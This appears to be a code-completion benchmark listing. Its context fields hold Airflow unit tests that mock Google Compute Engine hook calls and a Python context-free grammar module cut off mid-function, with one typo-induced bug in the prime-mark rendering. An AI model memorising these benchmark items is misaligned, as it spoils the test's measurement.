gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import unittest
from unittest import mock
from unittest.mock import PropertyMock
import pytest
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.compute import ComputeEngineHook, GceOperationStatus
from tests.providers.google.cloud.utils.base_gcp_mock import (
GCP_PROJECT_ID_HOOK_UNIT_TEST,
mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
GCE_ZONE = 'zone'
GCE_INSTANCE = 'instance'
GCE_INSTANCE_TEMPLATE = 'instance-template'
GCE_REQUEST_ID = 'request_id'
GCE_INSTANCE_GROUP_MANAGER = 'instance_group_manager'
class TestGcpComputeHookNoDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__',
new=mock_base_gcp_hook_no_default_project_id,
):
self.gce_hook_no_project_id = ComputeEngineHook(gcp_conn_id='test')
@mock.patch("airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.compute.build")
def test_gce_client_creation(self, mock_build, mock_authorize):
result = self.gce_hook_no_project_id.get_conn()
mock_build.assert_called_once_with(
'compute', 'v1', http=mock_authorize.return_value, cache_discovery=False
)
assert mock_build.return_value == result
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.start_instance(
project_id='example-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.stop_instance(
project_id='example-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_set_machine_type_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
set_machine_type_method = get_conn.return_value.instances.return_value.setMachineType
execute_method = set_machine_type_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.set_machine_type(
body={}, project_id='example-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
set_machine_type_method.assert_called_once_with(
body={}, instance='instance', project='example-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE, project_id='example-project'
)
assert res is not None
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.insert_instance_template(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST, body={}, request_id=GCE_REQUEST_ID
)
assert res is None
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.get_instance_group_manager(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST, zone=GCE_ZONE, resource_id=GCE_INSTANCE_GROUP_MANAGER
)
assert res is not None
get_method.assert_called_once_with(
instanceGroupManager='instance_group_manager', project='example-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_patch_instance_group_manager_overridden_project_id(
self, wait_for_operation_to_complete, get_conn
):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.patch_instance_group_manager(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID,
)
assert res is None
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone',
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
operation_name='operation_id', project_id='example-project', zone='zone'
)
class TestGcpComputeHookDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.gce_hook = ComputeEngineHook(gcp_conn_id='test')
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_start_instance(self, wait_for_operation_to_complete, get_conn, mock_project_id):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(project_id='new-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE)
assert res is None
start_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id', zone='zone'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_stop_instance(self, wait_for_operation_to_complete, get_conn, mock_project_id):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(project_id='new-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE)
assert res is None
stop_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id', zone='zone'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_set_machine_type_instance(self, wait_for_operation_to_complete, get_conn, mock_project_id):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_set_machine_type_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
project_id='new-project', body={}, zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id', zone='zone'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_template(self, wait_for_operation_to_complete, get_conn, mock_project_id):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE, project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
assert res is not None
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(project_id='new-project', resource_id=GCE_INSTANCE_TEMPLATE)
assert res is not None
get_method.assert_called_once_with(instanceTemplate='instance-template', project='new-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_insert_instance_template(self, wait_for_operation_to_complete, get_conn, mock_project_id):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
body={},
request_id=GCE_REQUEST_ID,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
project_id='new-project', body={}, request_id=GCE_REQUEST_ID
)
assert res is None
insert_method.assert_called_once_with(body={}, project='new-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_group_manager(self, wait_for_operation_to_complete, get_conn, mock_project_id):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is not None
get_method.assert_called_once_with(
instanceGroupManager='instance_group_manager', project='example-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
project_id='new-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE_GROUP_MANAGER
)
assert res is not None
get_method.assert_called_once_with(
instanceGroupManager='instance_group_manager', project='new-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_patch_instance_group_manager(self, wait_for_operation_to_complete, get_conn, mock_project_id):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone',
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
operation_name='operation_id', project_id='example-project', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_patch_instance_group_manager_overridden_project_id(
self, wait_for_operation_to_complete, get_conn
):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID,
)
assert res is None
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='new-project',
requestId='request_id',
zone='zone',
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
operation_name='operation_id', project_id='new-project', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._check_global_operation_status'
)
def test_wait_for_operation_to_complete_no_zone(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
num_retries = self.gce_hook.num_retries
# Test success
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
self.gce_hook._wait_for_operation_to_complete(
project_id=project_id, operation_name=operation_name, zone=None
)
mock_operation_status.assert_called_once_with(
service=service, operation_name=operation_name, project_id=project_id, num_retries=num_retries
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._check_global_operation_status'
)
def test_wait_for_operation_to_complete_no_zone_error(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
# Test error
mock_get_conn.return_value = service
mock_operation_status.return_value = {
'status': GceOperationStatus.DONE,
'error': {'errors': "some nasty errors"},
'httpErrorStatusCode': 400,
'httpErrorMessage': 'sample msg',
}
with pytest.raises(AirflowException):
self.gce_hook._wait_for_operation_to_complete(
project_id=project_id, operation_name=operation_name, zone=None
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._check_zone_operation_status')
def test_wait_for_operation_to_complete_with_zone(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
zone = 'west-europe3'
num_retries = self.gce_hook.num_retries
# Test success
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
self.gce_hook._wait_for_operation_to_complete(
project_id=project_id, operation_name=operation_name, zone=zone
)
mock_operation_status.assert_called_once_with(service, operation_name, project_id, zone, num_retries)
|
|
'''A Context Free Grammar class along with peripheral classes, data structures,
and algorithms.'''
import itertools
import cgi
from util.tree import Tree
from util.mixin import Comparable, Keyed, Subscripted, Primed
class Symbol(Comparable, Keyed):
'''A base class for symbols which appear in a grammar. Terminal and
Nonterminal classes derive from this.'''
def __init__(self, identifier):
'''Initialize the symbol with a string used to distinguish it.'''
assert isinstance(identifier, str)
self._identifier = identifier
@property
def name(self):
'''Return the symbol's name or identifier.'''
return self._identifier
def is_nonterminal(self):
'''Tell whether this is a nonterminal symbol.'''
raise NotImplementedError()
def is_terminal(self):
'''Tell whether this is a terminal symbol.'''
raise NotImplementedError()
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self._identifier)
def __eq__(self, y):
'''Symbols must be of the same class and have the same identifier to be
considered equal.'''
return (
self.__class__ == y.__class__ and
self._identifier == y._identifier)
def __key__(self):
return (self.sort_num(), self.name)
def sort_num(self):
return 0
def html(self):
'''Return a suitable representation of the object in html.'''
return '<i>%s</i>' % cgi.escape(self.name)
def dot_html(self):
return self.html()
class Nonterminal(Symbol):
'''A class for nonterminal symbols, or variables, in a grammar.'''
def __str__(self):
'''The nonterminal's name appears in angle brackets unless it is a
single capital letter.'''
if len(self.name) != 1 or not self.name.isupper():
return '<%s>' % self.name
return self.name
def is_nonterminal(self):
return True
def is_terminal(self):
return False
def sort_num(self):
return -1
def html(self):
return self._html_interp()
def html_insert(self, html):
return self._html_interp(insert=html)
def html_after(self, html):
return self._html_interp(after=html)
def dot_html(self):
return self._html_interp(dot=True)
def _html_interp(self, insert = '', after = '', dot = False):
if len(self.name) != 1:
return '⟨%s⟩%s%s' % (cgi.escape(self.name), insert, after)
tag = 'i' if dot else 'var'
return '<%s>%s%s</%s>%s' % (tag, cgi.escape(self.name), insert, tag, after)
def _next_unused(original, taken, start, type_):
while True:
result = type_(original, start)
if result in taken: start += 1
else: break
return result
class SubscriptedNonterminal(Subscripted, Nonterminal):
'''A nonterminal with a subscript.'''
def __init__(self, name, subscript):
Subscripted.__init__(self, subscript)
Nonterminal.__init__(self, name)
def __repr__(self):
return 'SubscriptedNonterminal(%r, %r)' % (self.name, self.subscript)
def html(self):
return self.html_after('<sub>%s</sub>' % cgi.escape(str(self.subscript)))
@staticmethod
def next_unused(name, nonterminals):
return _next_unused(name, nonterminals, 1, SubscriptedNonterminal)
class PrimedNonterminal(Primed, Nonterminal):
'''A nonterminal with some number of "prime" marks.'''
def __init__(self, name, num_primes):
Primed.__init__(self, num_primes)
Nonterminal.__init__(self, name)
def __repr__(self):
return 'PrimedNonterminal(%r, %r)' % (self.name, self.num_primes)
def html(self):
if self.num_primes == 2:
primestr = '″' # double prime
elif self.num_primes == 3:
primestr = '‴' # triple prime
elif self.num_primes == 4:
primtstr = '⁗' # quadruple prime
else:
primestr = '′' * self.num_primes
return self.html_insert(primestr)
def dot_html(self):
return self._html_interp(insert = ''' * self.num_primes, dot=True)
@staticmethod
def next_unused(name, nonterminals):
return _next_unused(name, nonterminals, 1, PrimedNonterminal)
class Terminal(Symbol):
'''A class for terminal symbols in a grammar.'''
def __str__(self):
'''The terminal's identifier appears in double quotes unless it is a
single lowercase letter.s'''
if len(self.name) != 1 or self.name.isupper():
return '"%s"' % self.name
return self.name
def is_nonterminal(self):
return False
def is_terminal(self):
return True
def html(self):
return '<code>%s</code>' % (cgi.escape(self.name)) if self.name else '“”'
def dot_html(self):
return '<b>%s</b>' % cgi.escape(self.name)
def sort_num(self):
return 1
class Marker(Terminal):
'''A class for special marker symbols e.g. at the bottom of stacks, the ends
of input tapes, etc. Traditionally represented as $, but may be initialized
with any identifier. It is equal to no terminal symbol.'''
def html(self):
if len(self.name) == 1:
return cgi.escape(self.name)
return Nonterminal.html(self)
def sort_num(self):
return 3
class Epsilon(Terminal):
def __init__(self):
super(Epsilon, self).__init__('')
def html(self):
return '<i>ε</i>'
def sort_num(self):
return 2
class ProductionRule(object):
'''A class for production rules in a context-free grammar. The left side
must consist of a single variable, and the right side must be a string of
terminals or nonterminals.'''
def __init__(self, left_side, right_side):
'''Initialize the rule with a variable for the left side and a sequence
of symbols for the right side.'''
assert isinstance(left_side, Symbol)
for s in right_side:
assert isinstance(s, Symbol)
self.left_side = left_side
self.right_side = tuple(right_side)
def __str__(self):
'''Represented with arrow notation. The symbols on the right side are
separated by spaces unless all of their string representations are a
aingle character long.'''
if all(map(lambda x: len(str(x)) == 1, self.right_side)):
sep = ''
else:
sep = ' '
return '%s -> %s' % (self.left_side, sep.join([str(s) for s in \
self.right_side]))
def __repr__(self):
return '%s(%s, %s)' % (self.__class__.__name__, repr(self.left_side), \
repr(self.right_side))
def __eq__(self, o):
'''Tests if the left and right side are equal.'''
return (
isinstance(o, ProductionRule) and
self.left_side == o.left_side and
self.right_side == o.right_side)
def __hash__(self):
return hash((self.left_side, self.right_side))
def _html(self, tohtml):
if self.right_side:
if any(filter(lambda X: isinstance(X, Terminal) and len(X.name) != 1, self.right_side)):
sep = ' '
else:
sep = ''
right = sep.join([tohtml(X) for X in self.right_side])
else:
right = '<i>ε</i>'
return '%s → %s' % (tohtml(self.left_side), right)
def html(self):
return self._html(lambda x: x.html())
def dot_html(self):
return self._html(lambda x: x.dot_html())
class ParseTree(Tree(Symbol)):
'''A class for parse trees or syntax trees.'''
@property
def symbol(self):
'''Return the symbol object at this node.'''
return self.value
class ContextFreeGrammar(object):
def __init__(self, *args):
'''Initialize a context-free grammar in one of three ways:
1. ContextFreeGrammar(string)
The CFG is built from a string listing its production rules which
follows a familiar syntax that allows test CFGs to be specified
quickly and easily. The names of all symbols are one letter long,
and all capital letters are treated as variables. Each line of the
string is of the form
A -> X1 | X2 | ... | Xn
where A is a variable and the Xi are sentential forms. The CFG's
terminal and nonterminal symbols are inferred from the productions
given. The left side of the first rule is made the start variable.
2. ContextFreeGrammar(list)
The CFG is built from a list of production rule objects. The
nonterminals, terminals, and start variable are all inferred from
this listing.
3. ContextFreeGrammar(Nu, Sigma, P, S)
The CFG's nonterminals (Nu), terminals (Sigma), production rules
(P), and start variable (S) are explicitly given and checked for
correctness.'''
if len(args) == 1:
if isinstance(args[0], str):
self._init_string(*args)
else:
self._check_productions(*args)
self._init_productions(*args)
elif len(args) == 4:
self._check_tuple(*args)
self._init_tuple(*args)
else:
raise TypeError('ContextFreeGrammar takes 1 or 4 arguments')
@property
def nonterminals(self):
'''Return a set of the nonterminal symbols which appear in the grammar.
'''
return self._get_symbols_of_type(Nonterminal) | \
set(p.left_side for p in self._productions) | \
self._extra_nonterminals
@property
def terminals(self):
'''Return a set of the terminal symbols which appear in the grammar.'''
return self._get_symbols_of_type(Terminal) | \
self._extra_terminals
@property
def productions(self):
'''Return a list of the productions of the grammar in order.'''
return self._productions
@property
def start(self):
'''Return the grammar's start variable.'''
return self._start
@property
def symbols(self):
'''Return a list of the grammar's nonterminals and terminals.'''
return self.nonterminals | self.terminals
def productions_with_left_side(self, left_side):
'''Return all production rules in the grammar with a certain
symbol on the left side.'''
return filter(lambda x: x.left_side == left_side, self.productions)
def production_dict(self):
'''Return a mapping of variables to the sentences they produce, in
order.'''
result = {n : [] for n in self.nonterminals}
for p in self.productions:
result[p.left_side].append(p.right_side)
return result
def _get_symbols_of_type(self, T):
return set(s for p in self._productions for s in p.right_side \
if isinstance(s, T))
def _init_string(self, string):
lines = filter(None, string.split('\n'))
split_sides = [[w.strip() for w in line.split('->', 1)] for line in lines]
for split_rule in split_sides:
if len(split_rule) != 2:
raise ValueError('line is not formatted as a rule')
left, right = split_rule
if not (len(left) == 1 and left.isupper()):
raise ValueError('%r is not valid on the left side of a production rule' % left)
